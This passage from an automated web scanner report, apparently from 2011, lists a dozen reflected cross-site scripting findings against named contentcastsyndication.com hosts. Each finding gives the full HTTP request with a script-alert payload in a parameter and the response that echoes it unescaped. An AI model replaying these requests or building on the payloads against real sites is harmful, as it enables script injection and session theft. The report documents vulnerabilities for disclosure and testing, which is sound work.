The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c623b<script>alert(1)</script>dc62085e88c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d1.aspx?p6(ct1&cd63i99&fCampaigns_Local_Audience~1=Consumer!)[]&i=1&banner=Button_180x90_Image&c623b<script>alert(1)</script>dc62085e88c=1 HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1978
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:59 GMT
Date: Fri, 30 Sep 2011 13:28:59 GMT
Connection: close

if (typeof (CspCampaigns) == "undefined") {
function CspCampaign(id, banner, url, weight, date, sid, sname) {
this._banner = banner;
this._url = url;
this._weight = weight;
...[SNIP]...


if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "d1.aspx?p6(ct1&cd63i99&fCampaigns_Local_Audience~1=Consumer!)[]&i=1&banner=Button_180x90_Image&c623b<script>alert(1)</script>dc62085e88c=1";
$$.scriptMap[scriptname].ready = true;
$$.scriptMap[scriptname].retObj = {id: "1", l: "EN", fb: 1?false:true};
if ($$.scriptMap[scriptname].retObj.fb)

...[SNIP]...

2.56. http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com/d1.aspx [p6(ct1&cd63i99&fCampaigns_Local_Audience~1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com
Path:   /d1.aspx

Issue detail

The value of the p6(ct1&cd63i99&fCampaigns_Local_Audience~1 request parameter is copied into the HTML document as plain text between tags. The payload bf147<script>alert(1)</script>093312afc6a was submitted in the p6(ct1&cd63i99&fCampaigns_Local_Audience~1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d1.aspx?p6(ct1&cd63i99&fCampaigns_Local_Audience~1=Consumer!)[]bf147<script>alert(1)</script>093312afc6a&i=1&banner=Button_180x90_Image HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1975
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:57 GMT
Date: Fri, 30 Sep 2011 13:28:57 GMT
Connection: close

if (typeof (CspCampaigns) == "undefined") {
function CspCampaign(id, banner, url, weight, date, sid, sname) {
this._banner = banner;
this._url = url;
this._weight = weight;
...[SNIP]...
tance);
})(CspCampaigns, "1");


if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "d1.aspx?p6(ct1&cd63i99&fCampaigns_Local_Audience~1=Consumer!)[]bf147<script>alert(1)</script>093312afc6a&i=1&banner=Button_180x90_Image";
$$.scriptMap[scriptname].ready = true;
$$.scriptMap[scriptname].retObj = {id: "1", l: "EN", fb: 1?false:true};
if ($$.script
...[SNIP]...

2.57. http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com/CSP [audience parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com
Path:   /CSP

Issue detail

The value of the audience request parameter is copied into the HTML document as plain text between tags. The payload 358ef<script>alert(1)</script>946f68d55f9 was submitted in the audience parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CSP?csp_request_type=validate&legacy=true&spanId=97654293&t=campaign&audience=Business358ef<script>alert(1)</script>946f68d55f9&banner=Button_180x90_Image&category=60&i=2&parentUrl=http%3A//www.cybertronpc.com/ HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 1100
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:58 GMT
Date: Fri, 30 Sep 2011 13:28:58 GMT
Connection: close

if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "CSP?csp_request_type=validate&legacy=true&spanId=97654293&t=campaign&audience=Business358ef%3
...[SNIP]...
cal_Audience~1=Business358efscriptalert(1)/script946f68d55f9!)[]&i=2&banner=Button_180x90_Image",ElementType:"campaign",ElementAction:"lightbox",extra:"{width: '750', height: '600'}",audience:"Business358ef<script>alert(1)</script>946f68d55f9",category:"60",banner:"Button_180x90_Image",domain:"c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com"};
$$.processQueue(scriptname);
} catch (ex) {
$$
...[SNIP]...

2.58. http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com/CSP [banner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com
Path:   /CSP

Issue detail

The value of the banner request parameter is copied into the HTML document as plain text between tags. The payload 5a247<script>alert(1)</script>3b2d0a6e687 was submitted in the banner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CSP?csp_request_type=validate&legacy=true&spanId=97654293&t=campaign&audience=Business&banner=Button_180x90_Image5a247<script>alert(1)</script>3b2d0a6e687&category=60&i=2&parentUrl=http%3A//www.cybertronpc.com/ HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 1104
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:59 GMT
Date: Fri, 30 Sep 2011 13:28:59 GMT
Connection: close

if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "CSP?csp_request_type=validate&legacy=true&spanId=97654293&t=campaign&audience=Business&banner
...[SNIP]...
aign",project:"microsoft",show:"true",url:"c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com/d1.aspx?p6(ct1&cd60i99&fCampaigns_Local_Audience~1=Business!)[]&i=2&banner=Button_180x90_Image5a247<script>alert(1)</script>3b2d0a6e687",ElementType:"campaign",ElementAction:"lightbox",extra:"{width: '750', height: '600'}",audience:"Business",category:"60",banner:"Button_180x90_Image5a247<script>
...[SNIP]...

2.59. http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com/CSP [category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com
Path:   /CSP

Issue detail

The value of the category request parameter is copied into the HTML document as plain text between tags. The payload fe653<script>alert(1)</script>2b5cd549d1f was submitted in the category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CSP?csp_request_type=validate&legacy=true&spanId=97654293&t=campaign&audience=Business&banner=Button_180x90_Image&category=60fe653<script>alert(1)</script>2b5cd549d1f&i=2&parentUrl=http%3A//www.cybertronpc.com/ HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 1104
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:59 GMT
Date: Fri, 30 Sep 2011 13:28:59 GMT
Connection: close

if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "CSP?csp_request_type=validate&legacy=true&spanId=97654293&t=campaign&audience=Business&banner
...[SNIP]...
true;
$$.scriptMap[scriptname].retObj = {SyndicationType:"campaign",project:"microsoft",show:"true",url:"c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com/d1.aspx?p6(ct1&cd60fe653<script>alert(1)</script>2b5cd549d1fi99&fCampaigns_Local_Audience~1=Business!)[]&i=2&banner=Button_180x90_Image",ElementType:"campaign",ElementAction:"lightbox",extra:"{width: '750', height: '600'}",audience:"Business",category:"60fe653<
...[SNIP]...

2.60. http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com/CSP [i parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com
Path:   /CSP

Issue detail

The value of the i request parameter is copied into the HTML document as plain text between tags. The payload ec059<script>alert(1)</script>2baf265cd60 was submitted in the i parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CSP?csp_request_type=validate&legacy=true&spanId=97654293&t=campaign&audience=Business&banner=Button_180x90_Image&category=60&i=2ec059<script>alert(1)</script>2baf265cd60&parentUrl=http%3A//www.cybertronpc.com/ HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 1063
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:59 GMT
Date: Fri, 30 Sep 2011 13:28:59 GMT
Connection: close

if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "CSP?csp_request_type=validate&legacy=true&spanId=97654293&t=campaign&audience=Business&banner
...[SNIP]...
bj = {SyndicationType:"campaign",project:"microsoft",show:"true",url:"c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com/d1.aspx?p6(ct1&cd60i99&fCampaigns_Local_Audience~1=Business!)[]&i=2ec059<script>alert(1)</script>2baf265cd60&banner=Button_180x90_Image",ElementType:"campaign",ElementAction:"lightbox",extra:"{width: '750', height: '600'}",audience:"Business",category:"60",banner:"Button_180x90_Image",domain:"c63445482505619
...[SNIP]...

2.61. http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com/CSP [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com
Path:   /CSP

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload aa69d<script>alert(1)</script>87750e937c1 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CSP?csp_request_type=validate&legacy=true&spanId=97654293&t=campaignaa69d<script>alert(1)</script>87750e937c1&audience=Business&banner=Button_180x90_Image&category=60&i=2&parentUrl=http%3A//www.cybertronpc.com/ HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 677
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:58 GMT
Date: Fri, 30 Sep 2011 13:28:58 GMT
Connection: close

if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "CSP?csp_request_type=validate&legacy=true&spanId=97654293&t=campaignaa69d%3Cscript%3Ealert(1)
...[SNIP]...
tton_180x90_Image&category=60&i=2&parentUrl=http%3A//www.cybertronpc.com/";
$$.scriptMap[scriptname].ready = true;
$$.scriptMap[scriptname].retObj = {SyndicationType:"campaignaa69d<script>alert(1)</script>87750e937c1",project:"microsoft",show:"false"};
$$.processQueue(scriptname);
} catch (ex) {
$$.log("Error in Queue:" + ex);
};
})(CSP_GLOBAL);
}

2.62. http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com/d1.aspx [banner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com
Path:   /d1.aspx

Issue detail

The value of the banner request parameter is copied into the HTML document as plain text between tags. The payload 8ca1f<script>alert(1)</script>c5c78f72b0f was submitted in the banner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d1.aspx?p6(ct1&cd60i99&fCampaigns_Local_Audience~1=Business!)[]&i=2&banner=Button_180x90_Image8ca1f<script>alert(1)</script>c5c78f72b0f HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1857
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:58 GMT
Date: Fri, 30 Sep 2011 13:28:58 GMT
Connection: close

if (typeof (CspCampaigns) == "undefined") {
function CspCampaign(id, banner, url, weight, date, sid, sname) {
this._banner = banner;
this._url = url;
this._weight = weight;
...[SNIP]...



if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "d1.aspx?p6(ct1&cd60i99&fCampaigns_Local_Audience~1=Business!)[]&i=2&banner=Button_180x90_Image8ca1f<script>alert(1)</script>c5c78f72b0f";
$$.scriptMap[scriptname].ready = true;
$$.scriptMap[scriptname].retObj = {id: "2", l: "EN", fb: 1?false:true};
if ($$.scriptMap[scriptname].retObj.fb)

...[SNIP]...

2.63. http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com/d1.aspx [i parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com
Path:   /d1.aspx

Issue detail

The value of the i request parameter is copied into the HTML document as plain text between tags. The payload a9128<script>alert(1)</script>eec64ebe9f4 was submitted in the i parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d1.aspx?p6(ct1&cd60i99&fCampaigns_Local_Audience~1=Business!)[]&i=2a9128<script>alert(1)</script>eec64ebe9f4&banner=Button_180x90_Image HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 2092
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:58 GMT
Date: Fri, 30 Sep 2011 13:28:58 GMT
Connection: close

if (typeof (CspCampaigns) == "undefined") {
function CspCampaign(id, banner, url, weight, date, sid, sname) {
this._banner = banner;
this._url = url;
this._weight = weight;
...[SNIP]...
n(instance) {
if (typeof (this.collection[instance]) != "undefined")
return this.collection[instance];
else return null;
}
};
}

CspCampaigns.Init("2a9128<script>alert(1)</script>eec64ebe9f4", "1");


(function(collection, instance) {
var c = new CspCampaign("Micr_BusinessPC_Res_Cus_Bus", "https://12.contentcastsyndication.com/FTP/Campaign/Microsoft/Micr_BusinessPC_Res_Bus/en/Banners/
...[SNIP]...

2.64. http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com/d1.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com
Path:   /d1.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4fab7<script>alert(1)</script>8924445d085 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d1.aspx?p6(ct1&cd60i99&fCampaigns_Local_Audience~1=Business!)[]&i=2&banner=Button_180x90_Image&4fab7<script>alert(1)</script>8924445d085=1 HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1972
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:59 GMT
Date: Fri, 30 Sep 2011 13:28:59 GMT
Connection: close

if (typeof (CspCampaigns) == "undefined") {
function CspCampaign(id, banner, url, weight, date, sid, sname) {
this._banner = banner;
this._url = url;
this._weight = weight;
...[SNIP]...


if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "d1.aspx?p6(ct1&cd60i99&fCampaigns_Local_Audience~1=Business!)[]&i=2&banner=Button_180x90_Image&4fab7<script>alert(1)</script>8924445d085=1";
$$.scriptMap[scriptname].ready = true;
$$.scriptMap[scriptname].retObj = {id: "2", l: "EN", fb: 1?false:true};
if ($$.scriptMap[scriptname].retObj.fb)

...[SNIP]...

2.65. http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com/d1.aspx [p6(ct1&cd60i99&fCampaigns_Local_Audience~1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com
Path:   /d1.aspx

Issue detail

The value of the p6(ct1&cd60i99&fCampaigns_Local_Audience~1 request parameter is copied into the HTML document as plain text between tags. The payload 96ce2<script>alert(1)</script>2e3102f7900 was submitted in the p6(ct1&cd60i99&fCampaigns_Local_Audience~1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d1.aspx?p6(ct1&cd60i99&fCampaigns_Local_Audience~1=Business!)[]96ce2<script>alert(1)</script>2e3102f7900&i=2&banner=Button_180x90_Image HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i2.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1969
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:57 GMT
Date: Fri, 30 Sep 2011 13:28:57 GMT
Connection: close

if (typeof (CspCampaigns) == "undefined") {
function CspCampaign(id, banner, url, weight, date, sid, sname) {
this._banner = banner;
this._url = url;
this._weight = weight;
...[SNIP]...
tance);
})(CspCampaigns, "2");


if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "d1.aspx?p6(ct1&cd60i99&fCampaigns_Local_Audience~1=Business!)[]96ce2<script>alert(1)</script>2e3102f7900&i=2&banner=Button_180x90_Image";
$$.scriptMap[scriptname].ready = true;
$$.scriptMap[scriptname].retObj = {id: "2", l: "EN", fb: 1?false:true};
if ($$.script
...[SNIP]...

2.66. http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com/CSP [audience parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com
Path:   /CSP

Issue detail

The value of the audience request parameter is copied into the HTML document as plain text between tags. The payload 59583<script>alert(1)</script>8de8e6e2519 was submitted in the audience parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CSP?csp_request_type=validate&legacy=true&spanId=69421819&t=campaign&audience=Business59583<script>alert(1)</script>8de8e6e2519&banner=Button_180x90_Image&category=57&i=3&parentUrl=http%3A//www.cybertronpc.com/ HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 1100
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:58 GMT
Date: Fri, 30 Sep 2011 13:28:58 GMT
Connection: close

if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "CSP?csp_request_type=validate&legacy=true&spanId=69421819&t=campaign&audience=Business59583%3
...[SNIP]...
cal_Audience~1=Business59583scriptalert(1)/script8de8e6e2519!)[]&i=3&banner=Button_180x90_Image",ElementType:"campaign",ElementAction:"lightbox",extra:"{width: '750', height: '600'}",audience:"Business59583<script>alert(1)</script>8de8e6e2519",category:"57",banner:"Button_180x90_Image",domain:"c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com"};
$$.processQueue(scriptname);
} catch (ex) {
$$
...[SNIP]...

2.67. http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com/CSP [banner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com
Path:   /CSP

Issue detail

The value of the banner request parameter is copied into the HTML document as plain text between tags. The payload e39c4<script>alert(1)</script>ab66cd8ff46 was submitted in the banner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CSP?csp_request_type=validate&legacy=true&spanId=69421819&t=campaign&audience=Business&banner=Button_180x90_Imagee39c4<script>alert(1)</script>ab66cd8ff46&category=57&i=3&parentUrl=http%3A//www.cybertronpc.com/ HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 1104
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:58 GMT
Date: Fri, 30 Sep 2011 13:28:58 GMT
Connection: close

if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "CSP?csp_request_type=validate&legacy=true&spanId=69421819&t=campaign&audience=Business&banner
...[SNIP]...
aign",project:"microsoft",show:"true",url:"c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com/d1.aspx?p6(ct1&cd57i99&fCampaigns_Local_Audience~1=Business!)[]&i=3&banner=Button_180x90_Imagee39c4<script>alert(1)</script>ab66cd8ff46",ElementType:"campaign",ElementAction:"lightbox",extra:"{width: '750', height: '600'}",audience:"Business",category:"57",banner:"Button_180x90_Imagee39c4<script>
...[SNIP]...

2.68. http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com/CSP [category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com
Path:   /CSP

Issue detail

The value of the category request parameter is copied into the HTML document as plain text between tags. The payload 4c8dc<script>alert(1)</script>715c4b4f13d was submitted in the category parameter. This input was echoed unmodified in the application's response.

